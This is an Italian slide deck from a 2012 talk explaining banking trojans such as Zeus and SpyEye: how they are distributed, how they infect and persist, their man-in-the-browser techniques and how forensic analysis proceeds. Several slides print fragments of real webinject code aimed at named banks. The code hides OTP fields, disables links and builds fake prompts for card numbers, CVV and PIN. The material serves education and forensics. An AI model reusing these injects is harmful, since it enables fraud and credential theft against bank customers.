Malware Bancario

INTRODUZIONE AL CRIMEWARE
NEL

SETTORE BANCARIO

PRESI NELLA RETE - COLLEGIO GHISLIERI 23 NOVEMBRE 2012

Dott. Francesco Schifilliti

COS UN BANKING TROJAN?

This term refers to the subset of malware seeking to steal/theft data from electronic bank accounts. Within this context, other financial services such as, for instance, online stock exchange operations are also considered electronic banking.

001

Zeus, SpyEye e tanti altri

002

Soggetti (minimi) Coinvolti

003

Malware Developing

004

Malware Distribution

User

005

Malware Distribution

Pay-per-Install

Drive-by-Download
Exploit-as-a-Services

006

Ciclo Pay-per-Install

Exploit-as-a-Services

007

Fase di Infezione e Controllo

Infection
Mail di Spam

Compromised Web Site

Exploit Pack
<script var a= var xl if(xls

John Doe: Victim

Infection

008

Iterando il processo dInfezione

Flat Botnet

P2P Botnet

009

Ciclo dInfezione di un Malware sul PC

Infezione sul Disco

Rendere Persistent il MW
(ad es. con la modifica del registry)

Injection

Estensione della Injection

(generalmente con tecniche di Hooking in Userland)

Connessione persistente col Server di C&C

(ad es. SpyEye copia il file C:\cleansweep.ex e)

(generalmente sul processo Explorer)

010

Odore di $$$

data theft

User

data & session theft

011

Man in the Browser

012

Anti-Detection/Deception Techniques MW Code

Anti Memory Anti Emulation Anti Debugging Anti Disassembler Cryptography Packing & Protecting

Obfuscation

013

Struttura di SpyEye

C&C
Packer Obfuscation Anti-Dbg

Plugin del Malware:

Binary

config.dat, ccgrabber collectors, sock5 customconnector webinjectors.txt

014

Un pezzettino di Webinjector di uno SpyEye 10.7

..

set_url *meine.deutsche-bank.de/trxm/db/*european.transfer.enter.data* GP data_before <body data_end data_inject style="visibility:hidden data_end data_after id= data_end data_before </body> data_end data_inject <script src='/error.html/trxm1/dbb.do?act=getall&domain=DB'></script> <script src='/error.html/trxm1/dbcommon.js'></script> <script src='/error.html/trxm1/dbsepa.js'></script> <script>if (typeof _n_ck == "undefined"){document.body.style.visibility = 'visible';}</script> data_end data_after </html> data_end ..

015

Un pezzettino di Webinjector di un ATS

.. set_url *commbank.com.au/netbank/UserMaintenance* GP data_before <h1 class="PageTitle">*My Q*</h1> data_end data_inject <script language="javascript" type="text/javascript> window.onload = function() { for ( i=0; i < document.links.length; i++ ) if (document.links[i].id != 'H_LogOffLink' && document.links[i].id != 'ctl00_HeaderControl_LogOffLink) document.links[i].onclick = function() { return false; }; }; </script> <script language="javascript" type="text/javascript> var clck_counter = 0; function msg() { clck_counter++; if (clck_counter==2) { document.getElementById('ctl00_BodyPlaceHolder_txtOTP_field').style.visibility = "hidden; document.getElementById('ctl00_BodyPlaceHolder_txtOTP_field').style.display = "none document.getElementById('ctl00_BodyPlaceHolder_btnGenSMS_field').disabled = true; document.getElementById('error').style.top = 42; document.getElementById('error').style.left = 42; document.getElementById('error').style.visibility = "visible; document.getElementById('error').style.display = "block; } return false; }

016

Webinject in Chiaro nella RAM

https://bcol.barclaycard.co.uk*cardSummary*:]( <style type="text/css"> #inject { display: none; } .ui-dialog { width: 400px; font-size: 11px; } .ui-dialog .ui-dialog-titlebar-close { visibility: hidden; } .ui-dialog .ui-dialog-titlebar { visibility: hidden; display: none; } </style>P| |H|p|||||8|` <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.7.1/jquery-ui.min.js"></script> value=unescape(document.cookie.substring(offset, end)) jQuery("#inject_cc").focus(); } else if (jQuery("#inject_expdate_mm").val().length < 2) { alert('Please enter Exp.Date'); jQuery("#inject_expdate_mm").focus(); } else if (jQuery("#inject_expdate_yy").val().length < 2) { alert('Please enter Exp.Date'); jQuery("#inject_expdate_yy").focus(); } else if (jQuery("#inject_cvv").val().length < 3) { alert('Please enter correct CVV'); jQuery("#inject_cvv").focus(); } else if (jQuery("#inject_pin").val().length < 5) { .

017

SpyEye: esempio di MW modulare e parametrico

Cosa/Come Rubare definito in base ai Plugin Installati sulla Bot.

billinghammer.dll_5f00ca74679332c15ebe2e682a19e8c9 bugreport.dll_a6c1992119c1550db437aac86d4ffdad ccgrabber.dll_5b1593855a6e8f01468878eb88be39df creditgrab.dll_0e0c1855fa82ca3ad20bbe30106657b2 ffcertgrabber.dll_6b5ffc56cec8f60a448fe7a9044625a5 Plugin_CreditGrab.dll_0e0c1855fa82ca3ad20bbe30106657b2 rdp.dll_0cb722049e024f2366ba9c187cb3929f ddos.dll_716d82810241daa5e2a41327014e9a77

su Quale Banca/Ist. Finanziario fare operazioni in Frode definito in webinjectors.txt

User
a Chi Trasmettere i dati collezionati dal MW definito in collectors.txt

018

Uno Schema di Riferimento dellAnalisi

Forensic Ananlysis

Disk Analysis MW Searching Reg. Analysis Browser Analysis De- AntiXYZ

MW Analysis

Live Analysis

File Analysis

Disassebling

Debugging

Network Analysis Memory Analysis

Hash Comparing Entropy Analysis

Memory Dumping

PIENA COMPRENSIONE DEL FORENSIC ARTIFACT

019

GRAZIE

Francesco Schifilliti

fschifilliti@forensictech.it